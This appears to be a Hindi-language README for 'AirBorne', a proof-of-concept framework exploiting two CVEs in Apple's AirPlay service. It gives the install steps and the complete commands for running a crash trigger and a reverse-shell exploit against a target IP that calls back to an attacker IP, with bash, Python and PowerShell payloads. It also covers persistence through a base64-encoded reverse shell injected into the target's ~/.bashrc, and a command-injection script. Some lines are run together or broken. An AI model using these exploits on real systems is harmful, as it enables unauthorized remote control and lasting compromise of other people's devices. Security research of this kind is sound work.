
poc for CVE-2025-24252 & CVE-2025-24132
CVE-2025-24252 और CVE-2025-24132 के लिए पूर्ण PoC फ्रेमवर्क
द्वारा ekomsSavior |
AirBorne एक संयुक्त proof-of-concept (PoC) फ्रेमवर्क है जो Apple की AirPlay सेवा में दो गंभीर कमजोरियों को लक्षित करता है। इसमें एक पूर्ण क्रैश ट्रिगर और एक कार्यशील रिवर्स शेल एक्सप्लॉइट शामिल है जिसमें वैकल्पिक पर्सिस्टेंस, लिसनर और कई पेलोड फॉर्मेट — सभी एक ही स्क्रिप्ट में हैं।
मूल संस्करण खोज रहे हैं?
लीगेसी संस्करण अभी भी इस रिपॉजिटरी कीlegacyब्रांच में उपलब्ध है।
इसे देखने के लिए:
git checkout legacy
.bashrc इंजेक्शन (Linux) का उपयोग करके वैकल्पिक पर्सिस्टेंस शामिल हैgit clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC
sudo apt update
sudo apt install -y python3-scapy netcat
एकल स्क्रिप्ट airborne.py में दोनों PoC और सभी तर्क शामिल हैं:
--exploit का उपयोग करके एक CVE चुनें--payload का उपयोग करके एक रिवर्स शेल पेलोड सेट करें--persistent का उपयोग करके लक्ष्य पर पर्सिस्टेंस सक्षम करता हैsudo python3 airborne.py --exploit 24252 --interface wlan0
मॉनिटर मोड में एक इंटरफ़ेस की आवश्यकता है।
डिफ़ॉल्ट bash शेल के साथ पूर्ण एक्सप्लॉइट शुरू करें:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
इसके बजाय Python शेल चुनें:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
Linux लक्ष्यों पर वास्तविक पर्सिस्टेंस सक्षम करें:
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
केवल शेल कमांड इंजेक्शन
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
| Payload | विवरण |
|---|---|
bash | TCP पर डिफ़ॉल्ट bash रिवर्स शेल |
python | socket और pty का उपयोग कर Python-आधारित रिवर्स शेल |
powershell |
--persistent का उपयोग करते समय, स्क्रिप्ट लक्ष्य के निम्नलिखित में एन्कोडेड रिवर्स शेल पेलोड जोड़ देगी:
~/.bashrc
यह सुनिश्चित करता है कि जब भी उपयोगकर्ता लॉग इन करता है या टर्मिनल खोला जाता है, तो आपको एक शेल प्राप्त होता है।
base64 का उपयोग करके एन्कोड किया जाता है और बफर ओवरफ्लो के बाद वितरित किया जाता हैयह प्रोजेक्ट केवल शैक्षिक, नैतिक और अधिकृत अनुसंधान के लिए है।
सिस्टम का अनधिकृत शोषण अवैध और अनैतिक है।
| पूर्ण Windows PowerShell RCE पेलोड (अस्पष्टित) |